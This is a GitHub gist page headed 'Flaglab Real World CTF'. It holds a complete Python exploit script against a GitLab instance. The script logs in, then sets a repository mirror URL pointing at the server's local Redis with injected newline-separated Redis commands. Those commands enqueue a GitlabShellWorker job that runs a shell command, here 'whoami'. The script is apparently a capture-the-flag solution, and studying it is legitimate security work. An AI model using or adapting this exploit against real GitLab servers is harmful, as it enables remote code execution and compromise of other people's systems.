Flaglab Real World CTF
#!/usr/bin/env python3 | |
import requests | |
import sys | |
from bs4 import BeautifulSoup | |
from urllib.parse import urljoin | |
import random | |
import logging | |
import time | |
s = requests.Session() | |
def get_csrf_token(html): | |
soup = BeautifulSoup(html) | |
auth_token = soup.find("input", {"name": "authenticity_token"}) | |
return auth_token["value"] | |
def login(username, password): | |
response = s.get(urljoin(target, '/users/sign_in')) | |
token = get_csrf_token(response.text) | |
data = { | |
'user[login]': username, | |
'user[password]': password, | |
'authenticity_token': token | |
} | |
response = s.post(urljoin(target, '/users/sign_in'), data=data) | |
assert(response.status_code == 200) | |
def execute_payload(username, project, payload): | |
namespace = username | |
response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository']))) | |
token = get_csrf_token(response.text) | |
url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n' | |
data = { | |
'_method': 'patch', | |
'project[remote_mirrors_attributes][0][enabled]': '1', | |
'project[remote_mirrors_attributes][0][only_protected_branches]': 'true', | |
'project[remote_mirrors_attributes][0][uri]': url, | |
'uri': url, | |
'authenticity_token': token, | |
'auth_metod': '', | |
'password': '' | |
} | |
response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data) | |
data = { | |
'_method': 'post', | |
'authenticity_token': token | |
} | |
response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data) | |
if __name__ == '__main__': | |
if len(sys.argv) != 5: | |
print("python3 exploit.py target username password projectname") | |
sys.exit(1) | |
target = sys.argv[1] | |
username = sys.argv[2] | |
password = sys.argv[3] | |
projectname = sys.argv[4] | |
jid = ''.join(random.choice('0123456789abcdeg') for n in range(24)) | |
payload = """ | |
multi | |
sadd resque:gitlab:queues system_hook_push | |
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" | |
exec | |
exec | |
""" % jid | |
login(username, password) | |
execute_payload(username, projectname, payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment